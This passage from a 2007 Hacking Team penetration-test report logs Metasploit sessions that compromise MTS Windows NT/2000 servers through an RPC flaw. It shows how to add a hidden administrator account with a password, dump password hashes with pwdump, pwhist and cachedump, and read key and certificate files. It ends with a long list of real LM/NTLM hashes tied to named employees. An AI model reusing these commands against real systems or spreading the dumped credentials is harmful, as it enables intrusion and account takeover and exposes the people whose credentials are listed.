An outdated version of Windows 2000 contains a critical vulnerability in the RPC service allowing
remote users to gain SYSTEM access:
msf > sessions -i 3
[*] Starting interaction with 3...
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 147 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>vol
vol
Volume in drive C has no label.
Volume Serial Number is C056-03E1
C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.210.18
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.210.1
C:\WINNT\system32>net user /ADD MTSWriter t3-st.st.4n-ge
net user /ADD MTSWriter t3-st.st.4n-ge
The command completed successfully.
C:\WINNT\system32>net localgroup administrators /add MTSWriter
net localgroup administrators /add MTSWriter
The command completed successfully.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is C056-03E1
Directory of C:\
06/11/2003 18:12 3,342 xde45128_hotfix0007.log
27/09/2004 11:15 4,572 artpdbg.log
20/06/2003 17:03 <DIR> Blp
06/11/2003 17:52 922,645 CADebug.log
07/03/2005 17:36 <DIR> CAMTASIA
20/03/2003 12:12 <DIR> dell
15/12/2004 16:54 <DIR> Documents and Settings
06/11/2003 18:02 <DIR> Holder
03/05/2005 14:59 <DIR> Index
15/04/2003 13:11 <DIR> install
02/05/2003 16:50 <DIR> junk
10/07/2003 10:46 2,403 keyMTS_MTS_LONDON.init
13/10/2004 16:48 <DIR> namprod
13/10/2004 16:53 <DIR> namtest
20/06/2003 17:02 <DIR> pricelink
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 148 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
07/03/2005 17:46 <DIR> Program Files
27/09/2004 11:11 39,352 RDMCConfig.xml
14/07/2003 17:49 <DIR> Reference Prices
06/11/2003 18:57 <DIR> REUTERS
21/03/2003 15:44 <DIR> Reuters.old
26/10/2005 14:06 <DIR> Robert
23/01/2006 17:50 <DIR> WINNT
27/09/2004 10:56 <DIR> WUTemp
21/03/2003 11:04 <DIR> Xtra
5 File(s) 972,314 bytes
19 Dir(s) 15,601,319,936 bytes free
C:\>
C:\WUTemp>PwDump.exe 127.0.0.1
PwDump.exe 127.0.0.1
Current directory for pwdump is C:\WUTemp
Using pipe {16A9E312-6AAD-4B20-B107-48C11F6B3994}
Key length is 16
Administrator:500:DE39D9281C64F167AA04C9CC30235CD8:6989028A536C2794CFC5E88A61849
04D:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
MTSWriter:1002:19FB4918FC87D8B37A8136F95E7B19C9:A9DA2A499B194C6606F345744C318AAE
:::
Completed.
pwdump6 Version 1.6.0 by fizzgig and the mighty group at foofus.net
Copyright 2007 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
C:\WUTemp>pwhist.exe
pwhist.exe
pwhist v0.96b, (C)2003 [email protected]
----------------------------------------
Administrator(current):500:de39d9281c64f167aa04c9cc30235cd8:6989028a536c2794cfc5
e88a6184904d:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 149 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MTSWriter(current):1002:19fb4918fc87d8b37a8136f95e7b19c9:a9da2a499b194c6606f3457
44c318aae:::
C:\WUTemp>dir
dir
Volume in drive C has no label.
Volume Serial Number is C056-03E1
Directory of C:\WUTemp
20/07/2007 07:15 <DIR> .
20/07/2007 07:15 <DIR> ..
20/07/2007 07:45 49,152 cachedump.exe
20/07/2007 04:07 114,735 cryptcat.exe
20/07/2007 07:45 552,960 fgdump.exe
20/07/2007 07:46 49,152 fgexec.exe
07/06/2007 11:56 32,768 imokav.exe
07/06/2007 11:56 49,152 lstarget.dll
20/07/2007 07:46 57,344 pstgdump.exe
21/06/2007 12:14 192,512 PwDump.exe
20/02/2004 14:10 65,536 pwhist.exe
27/09/2004 10:56 40,302 RDMCConfig.xml
10 File(s) 1,203,613 bytes
2 Dir(s) 15,600,152,576 bytes free
C:\WUTemp>cachedump.exe
cachedump.exe
sbhular:66B23AC2ACB68428F5CDFF66CF400CCC:mts:
reuters:7C0D4E7938544DCE112C1F526644EF42:mts:
lredgwell:D3FE318C6BD6136506CBA6603B845594:mts:
lonreuters:D024FF78EC69EC6902472558751B14B5:mts:
6.5.3 192.168.210.30 [Compromised]
Rating: compromised
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 150 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vendor/OS Microsoft Windows Version Windows NT 4.0
Hostname EURO-MTSHELP EURO-MTSHELP.MTS.COM
Compromised Compromised Directly Info Microsoft RPC
Auth Not needed
The host was alive and these additional information could be extracted:
21/tcp open ftp Microsoft ftpd 4.0
25/tcp open smtp Microsoft SMTP 5.5.1774.114.11
80/tcp open http Microsoft IIS webserver 4.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
465/tcp open smtp Microsoft SMTP 5.5.1774.114.11
1029/tcp open msrpc Microsoft Windows RPC
1030/tcp open omninames omniORB omniNames (Corba naming service)
1032/tcp open msrpc Microsoft RPC
1433/tcp open ms-sql-s?
6401/tcp open crystalenterprise?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=131 (Good luck!)
IPID Sequence Generation: Broken little-endian incremental
Service Info: Host: euro-mtshelp.MTS.COM; OS: Windows
This host is a Windows Active Directory Domain Controller.
An outdated version of Windows NT contains a critical vulnerability in the RPC service allowing
remote users to gain SYSTEM access:
msf > sessions -i 3
[*] Starting interaction with 3...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>vol
vol
Volume in drive C is System
Volume Serial Number is 98CD-F7B1
C:\WINNT\system32>ipconfig
ipconfig© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 151 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Windows NT IP Configuration
Ethernet adapter N1001:
IP Address. . . . . . . . . : 192.168.210.30
Subnet Mask . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . : 192.168.210.1
C:\WINNT\system32>
C:\>dir
dir
Volume in drive C is System
Volume Serial Number is 98CD-F7B1
Directory of C:\
11/07/01 11:37a 49 AUTOEXEC.BAT
11/08/01 11:58a 645 calltpassign.txt
11/08/01 12:02p 645 calltpassign2.txt
11/08/01 12:03p 645 calltpassign3.txt
10/13/01 11:26a <DIR> CA_LIC
06/12/01 05:28p 0 CONFIG.SYS
10/03/01 04:16p 1,102 key.txt
07/23/01 04:29p <DIR> MSSQL7
10/03/01 03:19p 905 NewKeyRq.txt
12/16/05 04:48p 1,073,741,824 pagefile.sys
12/16/05 04:58p <DIR> Program Files
12/17/04 03:44p 287 push.log
01/26/06 06:06p <DIR> TEMP
11/26/03 07:07p <DIR> TMP
12/16/05 04:48p <DIR> WINNT
15 File(s) 1,073,746,102 bytes
2,383,199,744 bytes free
C:\>net user /ADD MTSWriter t3-st.st.4n-ge
net user /ADD MTSWriter t3-st.st.4n-ge
System error 1312 has occurred.
A specified logon session does not exist. It may already have
been terminated.
C:\>type calltpassign.txt
type calltpassign.txt
The following helpdesk call has been assigned externally: 1394
Call Details
Call Summary : Login Failed
Call Descripti BondVision Test: Logon failed. Verify on the web site
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 152 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
htpp://mrc.mtsnet.it and the page is not responding.
The error
message "Page cannot be displayed" appears.
Client : MTS_MIL
Category 1: SYSTEM_PROBLEM
Category 2: SYSTEM_DOWN
Priority :
Date/time of 11/8/01 8:58:37AM
Product : BONDVISION
Assignment Detail
Assigned : 11/8/01 9:15:50 AM
To : Radianz
C:\>type key.txt
type key.txt
MIIDHDCCAoUCAQAwgYwxCzAJBgNVBAYTAlVLMQ8wDQYDVQQHEwZMb25kb24xDDAK
BgNVBAoTA01UUzEQMA4GA1UECxMHRXVyb01UUzEwMC4GCSqGSIb3DQEJARYhc2No
aW5jYXJpb2xfcmVuem9AZXVyb210cy1sdGQuY29tMRowGAYDVQQDExFSZW56byBT
Y2hpbmNhcmlvbDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAntdmAcDDkllg
RVOZmyranIOEV25oKFtUuNvY5YLSYGIh7qNKjpHwfLTuhACoUGoPR4wmxGpxsd1+
NAHM1hFlITb9Olo2ID+MumKc0m01nBmMtbJ+apUP56YGhMQpEOCd4CeURL1Ll1MG
I+cw8KEgIwZG/ttYhZK9l4piV2se7Y8CAwEAAaCCAU0wGgYKKwYBBAGCNw0CAzEM
Fgo0LjAuMTM4MS4yMDUGCisGAQQBgjcCAQ4xJzAlMA4GA1UdDwEB/wQEAwIB8DAT
BgNVHSUEDDAKBggrBgEFBQcDAjCB9wYKKwYBBAGCNw0CAjGB6DCB5QIBAR5UAE0A
aQBjAHIAbwBzAG8AZgB0ACAAQgBhAHMAZQAgAEMAcgB5AHAAdABvAGcAcgBhAHAA
aABpAGMAIABQAHIAbwB2AGkAZABlAHIAIAB2ADEALgAwA4GJACrHDhAGvqfN9fpm
D4ajikFYx69u9cGSPfVWqIFILol8BDZT42R5FjR96LCu1zzF63olLfK45PTyzZUL
3U8KnycZtfZSFncBLPaumtN/v2oikWvz25MNHNIAtbgUHD6elHupjsaE9Sv6tZUA
pZWyZYwxGXcAzVtOkmjkQmYXtdSTAAAAAAAAAAAwDQYJKoZIhvcNAQEFBQADgYEA
SQrURfLcLcNVI6dN0oJGifvbKqXnnWRTsHRnT7IkEU+rA4gNsVN9DHOzkKkQwKq8
CW8YtLjFTqZadUBCxXBvYbViLYQmvNPR9obljE9b2O9S84c3hW7er6IEL64yk0DK
V9xKJms+mFi1IsfuwxXJ0UKQz7zDIkc59sNLNsSfoB8=
C:\>type NewKeyRq.txt
type NewKeyRq.txt
Webmaster: [email protected]
Phone: +44 207 7866078
Server: Microsoft Key Manager for IIS Version 4.0
Common-name: mts.com
Organization Unit: EuroMTS
Organization: MTS
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 153 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Locality: London
State: England
Country: GB
-----BEGIN NEW CERTIFICATE REQUEST-----
MIIBojCCAQsCAQAwYjELMAkGA1UEBhMCR0IxEDAOBgNVBAgTB0VuZ2xhbmQxDzAN
BgNVBAcTBkxvbmRvbjEMMAoGA1UEChMDTVRTMRAwDgYDVQQLEwdFdXJvTVRTMRAw
DgYDVQQDEwdtdHMuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCwW+pb
9tta5YNpLcyIVL6vvD3DF/lHZwHr15dU2xwxDBz5InjOPOXkpbapMhdNYe0xmwYg
b/e+0n7dg+720ohvO3nof3Dw+3ZjJcOcxq3jU/hNV3Jzwnq47WU+GOUG7vW+htIh
03yZNhukPpWZMFYxnw4TJbG5yTgjvX79q7CEQQIDAQABoAAwDQYJKoZIhvcNAQEE
BQADgYEAD3D3L6cPNaRSQYN558jvjpXGu1BP+XTFulp6DUKWBYuzPRhjivy13nf2
K+yerKtePwIRyTwZas3gL/k7vWssm9zZTSrnwZE8wyFSKorXVOsJn/q4QH0Ioo+R
nx35y6DrE5fPWWg5xeODI7spn0dex4lr6UnS6xJRQOir/A3PesY=
-----END NEW CERTIFICATE REQUEST-----
C:\CA_LIC>dir
dir
Volume in drive C is System
Volume Serial Number is 98CD-F7B1
Directory of C:\CA_LIC
10/13/01 11:26a <DIR> .
10/13/01 11:26a <DIR> ..
07/18/00 07:40p 49,152 ARCUPG.DLL
04/30/00 10:56p 204,800 Asbrdcst.dll
06/04/00 08:58p 61,440 BAOFUPG.DLL
07/27/01 03:03p 231 ca.bak
02/15/03 01:42p 410 ca.olf
06/13/00 09:57a 61,440 cheyprod.dll
06/14/00 06:13p 167,936 ErrBox.exe
10/13/01 11:11a 141 EURO-MTSHELP.lrm
10/30/05 03:00a 56 LIC98.DAT
06/07/00 10:35a 88,576 LIC98.DLL
05/31/00 09:31a 4,840 LIC98.ERR
07/27/01 02:58p 223 lic98.log
11/10/99 02:35p 72,192 LIC98UPG.DLL
10/13/01 11:11a 2,443 LicFiles.Log
10/13/01 11:11a 3,264 Product.dat
06/06/00 12:32p 97,880 promo.bmp
06/15/00 02:46p 90 promo.dat
07/10/00 05:34p 661 RegIT.CNT
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 154 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
07/25/00 04:17p 739,840 RegIT.exe
07/14/00 12:05p 40,302 RegIT.hlp
07/27/01 03:03p 1,514 regit.log
06/09/00 02:49p 196,608 Regrmote.exe
02/04/99 03:17p 26,112 Remserv.exe
10/24/96 03:45p 401,760 Wintdist.exe
26 File(s) 2,221,911 bytes
2,383,199,744 bytes free
C:\>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest IUSR_BONDHELP
IUSR_EURO-MTSHELP IWAM_BONDHELP IWAM_EURO-MTSHELP
SQLAgentCmdExec
The command completed with one or more errors.
C:\>net share
net share
Share name Resource Remark
-------------------------------------------------------------------------------
IPC$ Remote IPC
C$ C:\ Default share
D$ D:\ Default share
E$ E:\ Default share
ADMIN$ C:\WINNT Remote Admin
HelpDesk D:\HelpDesk
The command completed successfully.
D:\>dir
dir
Volume in drive D is Data
Volume Serial Number is 1CFE-FB2E
Directory of D:\
02/18/03 06:08p <DIR> Backups
10/13/01 11:34a 3,472 ftsbuild_preinit.log
11/10/06 04:04p <DIR> HelpDesk
09/20/01 12:10p <DIR> Inetpub
10/13/01 11:34a 6,132 infobuild_preinit.log
10/22/04 11:27a <DIR> Mail_old
12/12/01 02:32p 409 MAPFILE.MAP
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 155 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
06/14/01 10:04a <DIR> Mts_old
10/22/04 11:27a <DIR> RB_old
10/22/04 11:39a <DIR> Support
10 File(s) 10,013 bytes
14,841,851,904 bytes free
D:\Backups>dir
dir
Volume in drive D is Data
Volume Serial Number is 1CFE-FB2E
Directory of D:\Backups
02/18/03 06:08p <DIR> .
02/18/03 06:08p <DIR> ..
08/02/01 08:09a <DIR> DB Backup 2 Aug 01
09/06/01 07:52a <DIR> DB Backup 6 Sept 01
02/17/03 01:18p <DIR> e-backup
02/18/03 06:39p <DIR> oldwebsites
02/17/03 01:19p <DIR> Pre_2002-12-27
02/17/03 01:24p <DIR> temp royal blue upgrade folder
02/17/03 01:24p <DIR> testemailaccount
9 File(s) 0 bytes
14,841,851,904 bytes free
6.5.4 192.168.210.31 [Compromised]
Rating: compromised
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Windows NT 4.0
Hostname EURO-MTSBDC
Compromi
sed
Compromised Directly Info Microsoft RPC
Auth Not needed
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 156 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive and these additional information could be extracted:
42/tcp open nameserver?
135/tcp open msrpc Microsoft RPC
139/tcp open netbios-ssn
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=43 (Good luck!)
IPID Sequence Generation: Broken little-endian incremental
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
An outdated version of Windows NT contains a critical vulnerability in the RPC service allowing
remote users to gain SYSTEM access:
msf > sessions -i 5
[*] Starting interaction with 5...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>vol
vol
Volume in drive C has no label.
Volume Serial Number is 780B-6307
C:\WINNT\system32>ipconfig
ipconfig
Windows NT IP Configuration
Ethernet adapter El90x1:
IP Address. . . . . . . . . : 192.168.210.31
Subnet Mask . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . : 192.168.210.1
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 780B-6307
Directory of C:\
06/27/01 10:07a 0 AUTOEXEC.BAT
06/27/01 09:59a 469 BOOT.PCP
06/27/01 10:07a 0 CONFIG.SYS
06/27/01 10:59a <DIR> mgafold
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 157 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
06/04/07 12:30p 549,453,824 pagefile.sys
11/19/05 02:42p <DIR> Program Files
12/17/04 03:44p 287 push.log
10/08/04 09:34a <DIR> Support
06/04/07 12:27p <DIR> TEMP
08/07/03 10:58a 9,404,928 TFTP106
06/07/04 03:02p <DIR> TMP
07/18/07 12:20a <DIR> WINNT
12 File(s) 558,859,508 bytes
2,433,675,776 bytes free
530 password hashes were retrieved:
1$:1524:960AC2D44BE1C4A2594EC5F4D5645C9D:466A938D490293EC1186B7DE7428914C:::
1$_history_0:1524:F9EA5F637B157DED26BFD9813312653C:D7103DF35D75DC1FE02D594EF756B1CC:::
2X7C20J$:1209:NO PASSWORD*********************:73EEB5B0AA9F01D16104DCA3D2D206CE:::
abattaglia:1424:D34959F12B2D1DE4AAD3B435B51404EE:6241765021A7F1CE664D312A0F41A846:::
abattaglia_history_0:1424:D34959F12B2D1DE4AAD3B435B51404EE:6241765021A7F1CE664D312A0F41A846:::
abattaglia_history_1:1424:0A49E6DAC81E8ECA9CA3F93CC74A319D:5A090B6A1DFF2376C8E4B2A81985B96B:::
AC0023$:1638:D60BC099CD340D502C9FE7B03ED423C8:B96A4EF6EBBF4C1F16D0EC0677002EE9:::
acaruso:1341:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
ACER$:1267:0C95454B39B532C7AAD3B435B51404EE:50B8C8AAD511B8DE23FF38A871F5FD03:::
aconlan:1582:NO PASSWORD*********************:NO PASSWORD*********************:::
aconlan_history_0:1582:77E5F7F4568A7D03AAD3B435B51404EE:695FD7C292892B54A09055D301FDFBDD:::
aconlan_history_1:1582:F200923239BFF534AAD3B435B51404EE:9A46046BB75D2A9EC6F3DC7AA52C19E7:::
Administrator:500:DE0FA7CA17985E371486235A2333E4D2:9F5AADDFBF4CC64A46A92338CD2296FC:::
Administrator_history_0:500:DE39D9281C64F167AA04C9CC30235CD8:6989028A536C2794CFC5E88A6184904D:::
Administrator_history_1:500:AB7CFC4B9A321DF3E72C57EF50F76A05:FE97B9E6AC3DDE58E1C5AD012833998B:::
ajauregui:1485:0F4ADE34E3D7FFAD41CDA145E059AA5C:23E61FD88137FDCBBD15043926C461E6:::
ajauregui_history_0:1485:0F4ADE34E3D7FFAD89699A19BE0BB386:8692884FFE05C4E807F9AD86CD353AEF:::
ajauregui_history_1:1485:0F4ADE34E3D7FFAD41CDA145E059AA5C:23E61FD88137FDCBBD15043926C461E6:::
akohler:1029:NO PASSWORD*********************:NO PASSWORD*********************:::
akohler_history_0:1029:0624DCC29E8C26CCAAD3B435B51404EE:6F2307D82FA3C6C0A835C3EF4506E8FD:::
akohler_history_1:1029:D2848FC5D644AD51AAD3B435B51404EE:57FF1932722BEF177240AED156311EF6:::
AKOHLER$:1244:NO PASSWORD*********************:83EB9EC5980A2094E3547AA73C5FA6CC:::
AKOHLER$_history_0:1244:E4874DD66F1BAD24457FBF3017405A40:0DBE14616A0E2610DF626FD29D09D965:::
AKOHLER2$:1562:NO PASSWORD*********************:18E924E52EA9B0E87A95F01042F4D970:::
AKOHLERTECRA$:1615:NO PASSWORD*********************:99E3743A05D78E898FD49F9C7742DE91:::
AKOHLERTECRA$_history_0:1615:73B566E43BD9629D21E24FEE9620C477:737C0B6387E3CF389F414C1AD68385D6:::
ALLENDELL$:1478:NO PASSWORD*********************:ED2DDE20F6E27FC17C5FF2D28F81708A:::
ALLLAN$:1061:NO PASSWORD*********************:74570F89630F0EA2BE2A6253058585C0:::
amalvar:1030:NO PASSWORD*********************:NO PASSWORD*********************:::
amalvar_history_0:1030:CD9A8B0587A4C1FCAAD3B435B51404EE:4907C5BD07521A0B5D6700C7950012C7:::
amalvar_history_1:1030:367609D22010C2E3AAD3B435B51404EE:FA28E17784F3F6BD32F98D18599EDAE5:::
AMALVAR$:1275:NO PASSWORD*********************:9F9CE8CC84CC9BE134DEE1050740695B:::
AMD400$:1404:NO PASSWORD*********************:101D2A65566D322BF1AC44DDFC43A558:::
amigliaccio:1560:6D883B5D87497348D76860F72C6C8620:2A4746435445E1339B610A24E7096C9F:::
amigliaccio_history_0:1560:470764E00C379152B737B6D8C4EA54E9:3C9F9A97654FDE8A62069F9EB3DEDB1D:::
ANGELOLAP$:1229:NO PASSWORD*********************:D30CEE2895C4B3A40D969FD65AEDDD6F:::
apassoni:1256:BB6D44B6C90CC3B5AAD3B435B51404EE:1706F444DEB6123AA09BF153B5EF6470:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 158 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
apassoni_history_0:1256:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
apassoni_history_1:1256:35E3F5DBF4CB1472AAD3B435B51404EE:65C8EC567A1AA36948F1378249C56454:::
aproni:1167:F3702E41EAF7BC16C81667E9D738C5D9:05FE35DE19D56B85DFED4B09CD466E27:::
aproni_history_0:1167:43187184504CED66AAD3B435B51404EE:5AF935EC742E226321527CF6D97E4C16:::
aproni_history_1:1167:D508ED03C6C980AAAAD3B435B51404EE:E0A1B41E9BA79FE47D0B600038B7B55C:::
APRONI$:1446:29169D12310053AB23EB73B0065269C7:DFC266011BDAA60C01E168157E43C5FF:::
APRONI-LAP$:1455:NO PASSWORD*********************:23B52DF596166B520F36DA9D09D4E8BC:::
ar:1581:EFBA859C82E3AFC2AAD3B435B51404EE:5650B360E71C803E1A2BB315E83FE4DB:::
ARATAJEK$:1220:NO PASSWORD*********************:DBC2C5381661985565EDC2DB9531661E:::
ARATAJEK$_history_0:1220:2DE72D24D4DBF2D1CB68F184551D1CE2:9844682BAE414A13CE4FF7DA60011A7B:::
aratajekold:1509:CF080B3053FB5E04C482C03F54CDB5D9:19154E8767F5461ED248699E80A0B9DF:::
aratajekold_history_0:1509:CF080B3053FB5E04C482C03F54CDB5D9:19154E8767F5461ED248699E80A0B9DF:::
aratajekold_history_1:1509:CF080B3053FB5E04C482C03F54CDB5D9:19154E8767F5461ED248699E80A0B9DF:::
arcserve:1073:6079A460A78B74FAED050A7AF7982F0F:AC90819ECFC867098B37EB18F814BE85:::
arcserve_history_0:1073:C09EB4110754B2767D17570E2C53CBDD:A7148A9C05D7D7472DE8B2DE1CCD81C4:::
arcserve_history_1:1073:6079A460A78B74FAED050A7AF7982F0F:AC90819ECFC867098B37EB18F814BE85:::
asarno:1642:NO PASSWORD*********************:NO PASSWORD*********************:::
ASHEIKH$:1085:NO PASSWORD*********************:C7CA2A7A70A261EF079686843FE2CBF0:::
ASHLIN$:1046:NO PASSWORD*********************:84A568F49C600929BFA0A7CD40384B55:::
atirassa:1345:033F04B3E0A94BBDAAD3B435B51404EE:10E2EFA0F4F0DD0D32A8679E56682166:::
A_PRO$:1444:515BE667481BF4A878CB06C456697C00:0314D69696E0595837407F4A3B42EE57:::
barozzi:1462:8F5B234E1F733256AAD3B435B51404EE:92229B91D189C914D24C6AB33EE5C211:::
barozzi_history_0:1462:8F5B234E1F733256AAD3B435B51404EE:92229B91D189C914D24C6AB33EE5C211:::
barozzi_history_1:1462:8F5B234E1F733256B18B234D924A045E:D2355F0A0B106C0B2766DA1B59505F54:::
Bbm2mtsnext:1636:NO PASSWORD*********************:NO PASSWORD*********************:::
bcooper:1396:NO PASSWORD*********************:NO PASSWORD*********************:::
bcooper_history_0:1396:2B02E03A31FAE1EC5D3872C04445E010:400AFEDBF27CB721BFFA19C96D36C4FF:::
bcooper_history_1:1396:2B02E03A31FAE1EC6D3A627C824F029F:FF77CAD949DBB585E5054393BD57F11F:::
BEN$:1049:NO PASSWORD*********************:8F8983147EF40303AF2F46315B68B7D9:::
BENTRAILL NEW$:1491:F3D319CFDF5C0470C54F7F656027CF9E:281687B3A88BA7694413FE1F9FCD9572:::
BENTRAILL NEW$_history_0:1491:78B05C547AFBF0A489A260E769DB063D:C092AD2106583909D059486A22F0C84F:::
BENTRAILLNEW$:1495:NO PASSWORD*********************:1AC539FB881149E0F47FFBF79C419BEA:::
BEVERLEY$:1064:NO PASSWORD*********************:77F92099761E3711664318C60F3CA284:::
BLP-67E42204BAE$:1553:NO PASSWORD*********************:8B0FDE02BEC8621015EF37BFCE27A437:::
blpuk:1425:131699E51717E3E6877D8C5FF319F4AF:1A4203156C999FC6B69F4EBD3C80DB9C:::
blpuk_history_0:1425:88470411055D13A2877D8C5FF319F4AF:7BDE04375B2A32E80B4A0E4AC1DC10B3:::
blpuk_history_1:1425:131699E51717E3E6877D8C5FF319F4AF:0EE35B6D958A8C833DA3E215314A385E:::
BOARDROOM$:1096:NO PASSWORD*********************:34D8CDE0AE6BE4502DB139E76B5EC73B:::
BOARDROOM$_history_0:1096:972D07E16E985BB4A53DA8C356366798:2008E749FA88EECA4B926321AF6EEBDC:::
bridget:1460:A4E09F7F0B6CB71F352502E32A407F23:0102ACE078969C52F22F78CD880FB82E:::
bridget_history_0:1460:A4E09F7F0B6CB71F352502E32A407F23:0102ACE078969C52F22F78CD880FB82E:::
bridget_history_1:1460:63578F7772C9019693E28745B8BF4BA6:09E7839C2F486359D9B60CCBC349EEFF:::
bshergill:1607:NO PASSWORD*********************:NO PASSWORD*********************:::
bshergill_history_0:1607:630505E57DC5617E352502E32A407F23:7BA2224F18AF09B32097E869D1B35460:::
bshergill_history_1:1607:E17D116F0B9CB901AAD3B435B51404EE:EA4811D2230B8B9EA034A3D128FA4BA7:::
BTRAIL$:1139:NO PASSWORD*********************:C43A3280413D7DEDAB0A47596E64778B:::
btraill:1036:NO PASSWORD*********************:NO PASSWORD*********************:::
BTRAILL$:1243:NO PASSWORD*********************:C6FA385B4EA13E5322B423B512027B6F:::
BTRAILL$_history_0:1243:A78F9A30A35F5064E2B234F385220A4F:3D08190BBA16B870CDF1E0356CC3F463:::
bwaters:1038:3402B7842419F9CAAAD3B435B51404EE:CAC331BC07EC8830CA1563716472A22C:::
bwaters_history_0:1038:1B772C019556AAF4417EAF50CFAC29C3:F91F2898C5ECED522B78A2E3DCC9F611:::
BYRON$:1395:NO PASSWORD*********************:AD031B5CB0F15B681A4E924C0601F95C:::
BYRON2$:1557:NO PASSWORD*********************:1AB97EF6D46B7FEB0F6CFB868310B813:::
C400_JON$:1207:NO PASSWORD*********************:3A0A87C1D2DB8CBFBFA8D787B7E539D4:::
C400_JON$_history_0:1207:032FCA9D22BD8A7905D7E116F48EE76A:28B4DE7E4BD0BD4AE44A2CB85C08348A:::
caitken:1373:ED0745C4DA7FB9B87B0B915DBF44DBB7:38FFB5E1B93563B6774A36C5AC54971C:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 159 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
